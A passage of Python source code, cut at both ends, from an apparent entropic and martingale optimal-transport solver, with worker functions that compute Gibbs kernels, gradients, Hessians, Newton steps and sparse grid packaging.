mu[i] == 0.:\r\n logmu_i = -infty\r\n else:\r\n logmu_i = np.log(mu[i])\r\n if calc_phi:\r\n Y_X = gridY-np.reshape(x_i,(1,dim))\r\n Y_X_index = np.reshape(Y_X[:, index], (lenY, 1))\r\n def phi_from_h(hi):\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n phi_i_loc = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n return phi_i_loc\r\n\r\n else:\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(hi_0,(1,dim))*gridY,\r\n axis = 1))/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n phi_h_x = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n gridY_index = np.reshape(gridY[:, index], (lenY, 1))\r\n x_i_index = x_i[index]\r\n \r\n def value_h(hi_index):\r\n if DATA['result_found']:\r\n return (0, 0*hi_index)\r\n DATA['hi'][index] = hi_index[0]\r\n hi = DATA['hi']\r\n DATA['hi_index'] = hi_index\r\n if calc_phi:\r\n DATA['phi_i'] = phi_from_h(hi)\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi, (1, dim))*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-psi-phi_h_x-np.sum(np.reshape(hi, (1, dim))*gridY,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if debug_mode == 4 and calc_phi:\r\n gf.check(gf.approx_Equal(np.sum(Gibbs),\r\n mu[i]), (np.sum(Gibbs), mu[i]))\r\n if calc_phi:\r\n value = (epsilon+phi_i)*mu_i\r\n gradient = -np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*Y_X_index, axis = 0)\r\n else:\r\n value = mu_i*(phi_h_x+np.dot(hi, x_i))+epsilon*np.sum(Gibbs)\r\n gradient = mu_i*x_i_index-np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*gridY_index, axis = 0)\r\n DATA['gradient'] = gradient\r\n if not newNewton:\r\n if np.linalg.norm(gradient, 1) <= tol_Newton_h:\r\n DATA['result_found'] = True\r\n DATA['result_opt'] = hi_index\r\n if debug_mode == 5:\r\n print(\"result found.\")\r\n val = value/mu_i\r\n grad = gradient/mu_i\r\n val += pen_h*0.5*np.dot(hi_index, hi_index)\r\n grad += pen_h*hi_index\r\n return (val, grad)\r\n \r\n def hessian_h(hi_index):\r\n DATA['hi'][index] = hi_index[0]\r\n hi = DATA['hi']\r\n \r\n if calc_phi:\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n multiplied_by_h_index = Y_X_index\r\n else:\r\n arg_Gibbs = (cost_array-psi-phi_h_x-np.sum(np.reshape(hi,(1,dim))*gridY,\r\n axis = 1))/epsilon\r\n multiplied_by_h_index = 
gridY_index\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess = 1/epsilon*np.sum(np.reshape(Gibbs,\r\n (lenY,1,1))*np.reshape(multiplied_by_h_index,\r\n (lenY,1,1))*np.reshape(multiplied_by_h_index,\r\n (lenY,1,1)), axis = 0)\r\n if calc_phi:\r\n if gf.approx_Equal(DATA['hi_index'], hi_index, tolerance = tol_Newton_h):\r\n gradient = DATA['gradient']\r\n else:\r\n gradient = value_h(hi_index)[1]\r\n hess -= 1/epsilon*1/mu_i*np.reshape(gradient,\r\n (1, 1))*np.reshape(gradient,(1, 1))\r\n hessian = hess/mu_i\r\n hessian += pen_h*np.eye(1)\r\n return hessian\r\n \r\n x0 = np.array([hi_index_0])\r\n if debug_mode == 5:\r\n disp = True\r\n else:\r\n disp = False\r\n if newNewton:\r\n result = gf.Newton(value_h, hessian_h, x0 = x0, tol = tol_Newton_h,\r\n maxiter= nmax_Newton_h, disp= disp,\r\n pow_distance = pow_distance,\r\n order_hess = 1./epsilon, invertor = zero*epsilon)\r\n else:\r\n result = minimize(value_h, x0 = x0,\r\n method='Newton-CG',\r\n jac=True, hess = hessian_h,\r\n tol=tol_Newton_h,\r\n options={'maxiter': nmax_Newton_h,\r\n 'xtol' : tol_Newton_h,\r\n 'disp' : disp})\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n hi = hi_0\r\n if calc_phi:\r\n if newNewton:\r\n hi[index] = result['x']\r\n elif DATA['result_found']:\r\n hi[index] = DATA['result_opt']\r\n else:\r\n hi[index] = result.x\r\n if gf.approx_Equal(hi, DATA['hi'], tolerance = zero**2):\r\n phi_i = DATA['phi_i']\r\n else:\r\n phi_i = phi_from_h(hi)\r\n\r\n else:\r\n if newNewton:\r\n hi[index] = result['x']\r\n elif DATA['result_found']:\r\n hi[index] = DATA['result_opt']\r\n else:\r\n hi[index] = result.x\r\n phi_i = phi_h_x+np.dot(hi, x_i)\r\n if debug_mode == 5:\r\n print(\"grad norm wololo\", np.linalg.norm(DATA['gradient']))\r\n return {'hi' : hi , 'i' : i , 'time_comp' : time_comp, 'phi_i' : phi_i}\r\n\r\n\r\ndef auxiliary_cost_minimax(i, arg):\r\n gridY = arg['gridY']\r\n cost = arg['cost']\r\n gridX = arg['gridX']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n min_cost = np.amin(cost_array)\r\n max_cost = np.amax(cost_array)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'min_cost' : min_cost,\r\n 'max_cost': max_cost}\r\n \r\n \r\ndef auxiliary_duplicate_values_grid(n, arg):\r\n value_names = arg['value_names']\r\n old_grid = arg['old_grid']\r\n point = arg['new_grid'][n]\r\n dim = arg['dim']\r\n \r\n result = {'n' : n}\r\n t_0 = timeit.default_timer()\r\n point = np.resize(point, (1, dim))\r\n distances = np.linalg.norm(old_grid-point, axis = 1)\r\n min_index = np.argmin(distances)\r\n for value_name in value_names:\r\n result['new_'+value_name] = arg['old_'+value_name][min_index]\r\n time_comp = timeit.default_timer()-t_0\r\n \r\n result['time_comp'] = time_comp\r\n return result\r\n\r\n \r\ndef auxiliary_vg_phi(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],\r\n (1,dim))*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = 
(cost_array-phi[i]-psi)/epsilon\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n gradient = -Gibbs\r\n value = epsilon*Gibbs\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'value' : value,\r\n 'gradient': gradient}\r\n\r\n\r\n\r\n\r\n\r\ndef auxiliary_vg_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n arg_Gibbs = (cost_array-phi-psi[j]-np.sum(h*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi-psi[j])/epsilon\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n gradient = -Gibbs\r\n value = epsilon*Gibbs\r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'value' : value,\r\n 'gradient': gradient}\r\n\r\n\r\ndef auxiliary_vg_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n lenY = arg['lenY']\r\n \r\n t_0 = timeit.default_timer()\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n cost_array = cost(gridX[i],gridY)\r\n if h is None:\r\n arg_Gibbs = (cost_array-phi[i]-psi)/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n gradient = -np.sum(np.reshape(Gibbs, (lenY,1))*Y_X, axis = 0)\r\n value = epsilon*np.sum(Gibbs)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'value' : value,\r\n 'gradient': gradient}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\ndef auxiliary_hess_phi(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n p_phi = arg['p_phi']\r\n p_psi = arg['p_psi']\r\n p_h = arg['p_h']\r\n lenY = arg['lenY']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],\r\n (1,dim))*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi[i]-psi)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess_p = 0.\r\n if p_phi is not None:\r\n hess_p += np.sum(p_phi[i]*Gibbs)\r\n if p_psi is not None:\r\n hess_p += np.sum(p_psi*Gibbs)\r\n if martingale and p_h is not None:\r\n hess_p += np.sum(np.reshape(p_h[i], (1, dim))*Y_X*np.reshape(Gibbs, (lenY, 1)))\r\n hess_p /= epsilon\r\n time_comp 
= timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'hess_p' : hess_p}\r\n\r\n\r\n\r\ndef auxiliary_hess_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n p_phi = arg['p_phi']\r\n p_psi = arg['p_psi']\r\n p_h = arg['p_h']\r\n lenX = arg['lenX']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale and p_h is not None:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j]-np.sum(h*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j])/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess_p = 0.\r\n if p_phi is not None:\r\n hess_p += np.sum(p_phi*Gibbs)\r\n if p_psi is not None:\r\n hess_p += np.sum(p_psi[j]*Gibbs)\r\n if martingale and p_h is not None:\r\n hess_p += np.sum(p_h*Y_X*np.reshape(Gibbs, (lenX, 1)))\r\n hess_p /= epsilon\r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'hess_p' : hess_p}\r\n\r\n\r\n\r\n\r\ndef auxiliary_hess_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n p_phi = arg['p_phi']\r\n p_psi = arg['p_psi']\r\n p_h = arg['p_h']\r\n lenY = arg['lenY']\r\n \r\n t_0 = timeit.default_timer()\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n cost_array = cost(gridX[i],gridY)\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X, axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess_p = np.zeros(lenY)\r\n if p_phi is not None:\r\n hess_p += p_phi[i]*Gibbs\r\n if p_psi is not None:\r\n hess_p += p_psi*Gibbs\r\n if p_h is not None:\r\n hess_p += np.sum(np.reshape(p_h[i], (1, dim))*Y_X*np.reshape(Gibbs,\r\n (lenY, 1)), axis = 1)\r\n hess_p = np.sum(np.reshape(hess_p, (lenY, 1))*Y_X, axis = 0)\r\n hess_p /= epsilon\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'hess_p' : hess_p}\r\n\r\n\r\n\r\n\r\ndef auxiliary_hess_h_inv(i, arg):\r\n gridX = arg['gridX']\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n dim = arg['dim']\r\n lenX = arg['lenX']\r\n lenY = arg['lenY']\r\n zero = arg['zero']\r\n include_phi = arg['include_phi']\r\n# mu = arg['mu']\r\n \r\n t_0 = timeit.default_timer()\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n cost_array = cost(gridX[i],gridY)\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n# print(\"phi 
in = \", phi)\r\n# print(\"psi in = \", psi)\r\n# print(\"h in = \", h)\r\n# print(\"Gibbs = \", Gibbs)\r\n hess_h_h = np.reshape(Y_X, (lenY, dim, 1))*np.reshape(Gibbs,\r\n (lenY, 1, 1))*np.reshape(Y_X, (lenY, 1, dim))\r\n hess_h_h = np.sum(hess_h_h, axis = 0)\r\n hess_h_h /= epsilon\r\n dim_final = dim\r\n if include_phi:\r\n hess_phi_phi = np.array([np.sum(Gibbs)/epsilon])\r\n# gf.check(gf.approx_Equal(np.sum(Gibbs), mu[i]), (np.sum(Gibbs), mu[i]))\r\n cross_phi_h = np.reshape(Gibbs, (lenY, 1))*Y_X\r\n cross_phi_h = np.sum(cross_phi_h, axis = 0)\r\n cross_phi_h /= epsilon\r\n# print(\"test is zero\", cross_phi_h)\r\n up = np.concatenate((hess_phi_phi, cross_phi_h))\r\n up = np.reshape(up, (1,dim+1))\r\n down = np.concatenate((cross_phi_h.reshape(dim, 1), hess_h_h), axis = 1)\r\n hess_h_h = np.concatenate((up,down))\r\n dim_final +=1\r\n hess_h_inv = np.linalg.inv(hess_h_h+zero/lenX*np.eye(dim_final))\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'hess_h_inv' : hess_h_inv}\r\n\r\n\r\n\r\ndef auxiliary_diag_hess_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n lenX = arg['lenX']\r\n mu = arg['mu']\r\n martingale = arg['martingale']\r\n hess_h_inv = arg['hess_h_inv']\r\n include_phi = arg['include_phi']\r\n zero = arg['zero']\r\n no_impl = arg['no_impl']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j]-np.sum(h*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j])/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if not no_impl:\r\n if not martingale or not include_phi:\r\n diag = -np.sum(Gibbs*Gibbs/np.maximum(mu, zero/lenX))/epsilon\r\n else:\r\n diag = 0.\r\n if martingale:\r\n if include_phi:\r\n ones = np.zeros(lenX)+1.\r\n ones = np.reshape(ones, (lenX, 1))\r\n Y_X_use = np.concatenate((ones, Y_X), axis = 1)\r\n dim_use = dim+1\r\n else:\r\n Y_X_use = Y_X\r\n dim_use = dim\r\n Gibbs_Y_X = np.reshape(Gibbs,(lenX, 1))*Y_X_use/epsilon\r\n Gibbs_Y_X_left = np.reshape(Gibbs_Y_X,(lenX, dim_use, 1))\r\n Gibbs_Y_X_right = np.reshape(Gibbs_Y_X,(lenX, 1, dim_use))\r\n diag -= np.sum(Gibbs_Y_X_left*hess_h_inv*Gibbs_Y_X_right)\r\n else:\r\n diag = 0.\r\n diag += np.sum(Gibbs)/epsilon\r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'diag' : diag}\r\n \r\n \r\n \r\ndef auxiliary_diag_hess_phi_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n nu = arg['nu']\r\n lenY = arg['lenY']\r\n martingale = arg['martingale']\r\n zero = arg['zero']\r\n no_impl = arg['no_impl']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = 
gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],\r\n (1,dim))*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi[i]-psi)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if not no_impl:\r\n diag_phi = -epsilon*np.sum(Gibbs*Gibbs/np.maximum(nu, zero/lenY))\r\n if martingale:\r\n diag_h = np.sum(np.reshape(Gibbs**2/np.maximum(nu, zero/lenY), (lenY, 1))*Y_X**2, axis = 0)\r\n else:\r\n diag_h = None\r\n else:\r\n diag_phi = 0\r\n if martingale:\r\n diag_h = np.zeros(dim)\r\n else:\r\n diag_h = None\r\n diag_phi += np.sum(Gibbs)/epsilon\r\n if martingale:\r\n diag_h += np.sum(np.reshape(Gibbs, (lenY, 1))*Y_X**2, axis = 0)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'diag_phi' : diag_phi, 'diag_h' : diag_h}\r\n \r\n \r\n\r\ndef auxiliary_expectation_cost(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n phi_test = arg['phi_test']\r\n psi_test = arg['psi_test']\r\n h_test = arg['h_test']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n dual = arg['dual']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n h_times = np.sum(np.reshape(h[i],(1,dim))*Y_X, axis = 1)\r\n Delta = cost_array-phi[i]-psi-h_times\r\n arg_Gibbs = Delta/epsilon\r\n else:\r\n Delta = cost_array-phi[i]-psi\r\n arg_Gibbs = Delta/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n expectation_i = np.sum(Gibbs*cost_array)\r\n mass = np.sum(Gibbs)\r\n if dual:\r\n expect_dual_i = np.sum(Gibbs*psi_test)\r\n expect_dual_i += mass*phi_test[i]\r\n if martingale:\r\n h_test_times = np.sum(np.reshape(h_test[i],(1,dim))*Y_X, axis = 1)\r\n expect_dual_i += np.sum(Gibbs*h_test_times)\r\n gap_phi = -mass*np.max(cost_array-phi_test[i]-psi_test-h_test_times)\r\n else:\r\n expect_dual_i = None\r\n gap_phi = None\r\n time_comp = timeit.default_timer()-t_0\r\n return {'time_comp' : time_comp, 'expectation_i' : expectation_i,\r\n 'expect_dual_i' : expect_dual_i, 'mass' : mass, 'gap_phi' : gap_phi}\r\n \r\n \r\n\r\n\r\ndef sparsify(vector, structure_matrix, index, dim = None, length = None):\r\n if dim is None:\r\n sparse_vector_matrix = structure_matrix[index].multiply(vector)\r\n sparse_vector = np.array(sparse_vector_matrix.data)\r\n else:\r\n sparse_vector = np.zeros(dim*length)\r\n sparse_vector = np.reshape(sparse_vector, (dim, length))\r\n for d in range(dim):\r\n sparse_vector[d] = sparsify(vector[d], structure_matrix, index)\r\n sparse_vector = sparse_vector.transpose()\r\n return sparse_vector\r\n\r\n\r\n \r\n\r\n\r\ndef auxiliary_sparse_grid(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n mu = arg['mu']\r\n nu = arg['nu']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n proba_min = arg['proba_min']\r\n no_sto = 
arg['no_sto']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n h_times = np.sum(np.reshape(h[i],(1,dim))*Y_X, axis = 1)\r\n Delta = cost_array-phi[i]-psi-h_times\r\n arg_Gibbs = Delta/epsilon\r\n else:\r\n Delta = cost_array-phi[i]-psi\r\n arg_Gibbs = Delta/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n Yx = np.where(Gibbs/mu[i]>= proba_min)[0]\r\n Yy = np.where(Gibbs/nu>= proba_min)[0]\r\n non_zero_x = len(Yx)\r\n non_zero_y = len(Yy)\r\n Xx = np.zeros(non_zero_x)+i\r\n Xy = np.zeros(non_zero_y)+i\r\n if no_sto:\r\n Xx = None\r\n Xy = None\r\n Yx = None\r\n Yy = None\r\n else:\r\n Xx = list(Xx)\r\n Xy = list(Xy)\r\n Yx = list(Yx)\r\n Yy = list(Yy)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'time_comp' : time_comp, 'Xx' : Xx,\r\n 'Yx' : Yx, 'Xy' : Xy, 'Yy' : Yy,\r\n 'non_zero_x' : non_zero_x, 'non_zero_y' : non_zero_y}\r\n\r\n\r\n\r\n\r\n\r\ndef auxiliary_Tan(i, arg):\r\n gridX = arg[ 'gridX']\r\n gridY = arg[ 'gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi= arg['psi']\r\n calc_Gamma= arg['calc_Gamma']\r\n zero= arg['zero']\r\n param_hidden= arg['param_hidden']\r\n loc_convex_hull= arg['loc_convex_hull']\r\n x = gridX[i]\r\n h_i = arg['h'][i]\r\n func = cost(x, gridY)\r\n func -= psi\r\n \r\n t_0 = timeit.default_timer()\r\n DATA = loc_convex_hull(x,func, gridY, zero = zero ,\r\n hidden_contact = calc_Gamma,\r\n param_hidden = param_hidden,\r\n gradient_guess = h_i)\r\n time_CH = timeit.default_timer()-t_0\r\n \r\n time_shit = 0.\r\n \r\n \r\n argvectors = np.array(DATA['argcontact'])\r\n value_loc=DATA['value']\r\n gradient_loc = DATA['gradient']\r\n coeffs = np.array(DATA['coeffs'])\r\n total_argcontact = []\r\n total_contact = []\r\n if calc_Gamma:\r\n total_argcontact = DATA['total_argcontact']\r\n total_contact = DATA['total_contact']\r\n return {'value' : value_loc, 'argcontact' : argvectors, 'coeffs' : coeffs,\r\n 'total_contact' : total_contact, 'total_argcontact' : total_argcontact,\r\n 'gradient' : gradient_loc, 'time_comp' : time_CH ,\r\n 'index' : i, 'time_shit' : time_shit }\r\n \r\n\r\n \r\ndef auxiliary_package(arg):\r\n i_0= arg['i_0']\r\n size_job= arg['size_job']\r\n auxiliary = arg['auxiliary']\r\n total_len= arg['total_len']\r\n if arg['sparse_is_on']:\r\n sparsify = arg['sparsify']\r\n if arg['axis']=='x':\r\n structure_matrix = arg[\"sparse_gridXY\"]\r\n if 'psi' in arg.keys():\r\n psi = arg['psi']\r\n if 'gridY_sparse' in arg.keys():\r\n gridY_sparse = arg['gridY_sparse'] \r\n if 'nu' in arg.keys():\r\n nu = arg['nu'] \r\n if 'p_psi' in arg.keys():\r\n p_psi = arg['p_psi']\r\n elif arg['axis']=='y':\r\n structure_matrix = arg[\"sparse_gridYX\"]\r\n if 'phi' in arg.keys():\r\n phi = arg['phi']\r\n if 'h_sparse' in arg.keys() and arg['martingale']:\r\n h_sparse = arg['h_sparse']\r\n if 'gridX_sparse' in arg.keys():\r\n gridX_sparse = arg['gridX_sparse']\r\n if 'mu' in arg.keys():\r\n mu = arg['mu'] \r\n if 'p_phi' in arg.keys():\r\n p_phi = arg['p_phi'] \r\n if 'p_h_sparse' in arg.keys():\r\n p_h_sparse = arg['p_h_sparse']\r\n else:\r\n raise ValueError(\"no \"+arg['axis']+\" axis\") # fix: a bare-string raise is a TypeError in Python 3\r\n\r\n package = []\r\n for k in range(size_job):\r\n index = k+i_0\r\n if index >= total_len:\r\n break\r\n if arg['sparse_is_on']:\r\n if arg['axis']=='x':\r\n if 
'psi' in arg.keys():\r\n arg['psi'] = sparsify(psi, structure_matrix, k)\r\n lenY = len(arg['psi'])\r\n arg['lenY'] = lenY\r\n if 'gridY_sparse' in arg.keys():\r\n arg['gridY'] = sparsify(gridY_sparse, structure_matrix,\r\n k, dim = arg['dim'], length = lenY) \r\n if 'nu' in arg.keys():\r\n arg['nu'] = sparsify(nu, structure_matrix, k) \r\n if 'p_psi' in arg.keys():\r\n arg['p_psi'] = sparsify(p_psi, structure_matrix, k)\r\n elif arg['axis']=='y':\r\n if 'phi' in arg.keys():\r\n arg['phi'] = sparsify(phi, structure_matrix, k)\r\n lenX = len(arg['phi'])\r\n arg['lenX'] = lenX\r\n if 'h_sparse' in arg.keys() and arg['martingale']:\r\n arg['h'] = sparsify(h_sparse, structure_matrix,\r\n k, dim = arg['dim'], length = lenX) \r\n if 'gridX_sparse' in arg.keys():\r\n arg['gridX'] = sparsify(gridX_sparse, structure_matrix,\r\n k, 